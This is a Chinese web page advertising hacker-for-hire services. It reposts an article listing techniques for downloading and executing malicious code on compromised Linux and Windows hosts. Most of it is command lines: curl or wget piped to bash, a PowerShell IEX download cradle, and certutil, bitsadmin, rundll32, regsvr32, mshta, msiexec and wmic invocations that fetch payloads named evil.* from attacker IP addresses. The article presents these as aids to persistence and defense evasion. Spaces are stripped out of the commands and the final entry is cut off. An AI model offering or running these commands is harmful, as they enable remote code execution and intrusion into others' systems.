黑客24小时在线接单网站

黑客24小时在线接单网站,黑客接单,接单网站,黑客入口

通过命令下载执行恶意代码的几种姿势

本文转载自微信公众号「Bypass」,作者Bypass。转载本文请联系Bypass公众号。

在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。

在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。

一、Linux 远程恶意代码执行

01、curl

以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。

  • 方式1:curl-fsSLhttp://192.168.99.19:8080/test.sh|bash
  • 方式2:bash<<(curlhttp://192.168.99.19:8080/test.sh)
  • 02、wget

    执行wget命令远程下载恶意程序。

  • 方式1:wget-q-O-http://192.168.99.19:8080/test.sh|bash
  • 方式2:wgethttp://192.168.99.19:8080/shell.txt-O/tmp/x.php&&php/tmp/x.php
  • curl+wget合并,实现无文件远程恶意代码执行。

  • bash-c'(curl-fsSLhttp://192.168.99.19:8080/test.sh||
  • wget-q-O-http://192.168.99.19:8080/test.sh)|bash-sh>/dev/null2>&1&'
  • 03、rcp

    rcp命令用于复制远程文件或目录。

  • rcproot@x.x.x.x:./testfiletestfile
  • 04、scp

    scp 是 rcp 的加强版,scp 是加密的,rcp 是不加密的。

  • scpusername@servername:/path/filename/tmp/local_destination
  • 05、rsync

    使用rsync可以进行远程同步,拉取文件到本地服务器。

  • rsync-avx.x.x.x:/tmp/passwd.txt/tmp/passwd.txt
  • 06、sftp

    使用sftp下载远程服务器上的文件。

  • sftpadmin@192.168.99.242<<EOF
  • get/tmp/2.txt
  • quit
  • EOF
  • 二、Windows 远程恶意代码执行

    01、Powershell

    利用powershell远程执行ps1脚本。

  • powershell-nop-whidden-c"IEX((new-objectnet.webclient).downloadstring('http://192.168.28.128/evil.txt'))"
  • 02、Bitsadmin

    利用bitsadmin命令下载文件到目标机器。

  • bitsadmin/transfernhttp://192.168.28.128/imag/evil.txtd:\test\1.txt
  • 03、certutil

    用于备份证书服务,一般建议下载完文件后对缓存进行删除。

  • #下载文件
  • certutil-urlcache-split-fhttp://192.168.28.128/imag/evil.txttest.php
  • #删除缓存
  • certutil-urlcache-split-fhttp://192.168.28.128/imag/evil.txtdelete
  • 04、rundll32

    使用rundll32.exe,可以通过mshtml.dll执行JavaScript ,依赖于WScript.shell这个组件

  • rundll32.exejavascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd/ctaskkill/f/imrundll32.exe",0,true);}
  • 05、regsvr32

    远程加载执行,解析.src文件。

  • regsvr32.exe/u/n/s/i:http://192.168.28.131:8888/file.sctscrobj.dll
  • 06、wmic

    执行WMIC以下命令从远程服务器下载并运行恶意XSL文件:

  • wmicosget/FORMAT:"http://192.168.28.128/evil.xsl"
  • 07、msiexec

    用于安装Windows Installer安装包,可远程执行msi文件。

  • msiexec/q/ihttp://192.168.28.128/evil.msi
  • 08、IEExec

    IEexec.exe应用程序是.NET Framework附带程序,运行IEExec.exe并使用url启动其他程序。

  • crosoft.NET\Framework64\v2.0.50727>caspol.exe-soff
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exehttp://192.168.28.131/evil.exe
  • 09、mshta

    mshta用于执行.hta文件

  • mshtahttp://192.168.28.128/run.hta
  • 10、msxsl

    msxsl.exe是微软用于命令行下处理XSL的一个程序

  • msxslhttp://192.168.28.128/scripts/demo.xmlhttp://192.168.28.128/scripts/exec.xsl
  • 11、pubprn.vbs

    在Windows 7以上版本存在一个名为pubprn.vbs的微软已签名WSH脚本,可以利用来解析.sct脚本:

  • "C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs"127.0.0.1script:https:
    • 评论列表:
    •  酒奴做啡
       发布于 2022-06-04 09:08:18  回复该评论
    • ument.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false
    •  闹旅海夕
       发布于 2022-06-04 13:43:45  回复该评论
    • cript.Shell").Run("cmd/ctaskkill/f/imrundll32.exe",0,true);}05、regsvr32远程加载执行,解析.src文件。regsvr

    发表评论:

    «    2024年8月    »
    1234
    567891011
    12131415161718
    19202122232425
    262728293031
    文章归档
    标签列表

    Powered By

    Copyright Your WebSite.Some Rights Reserved.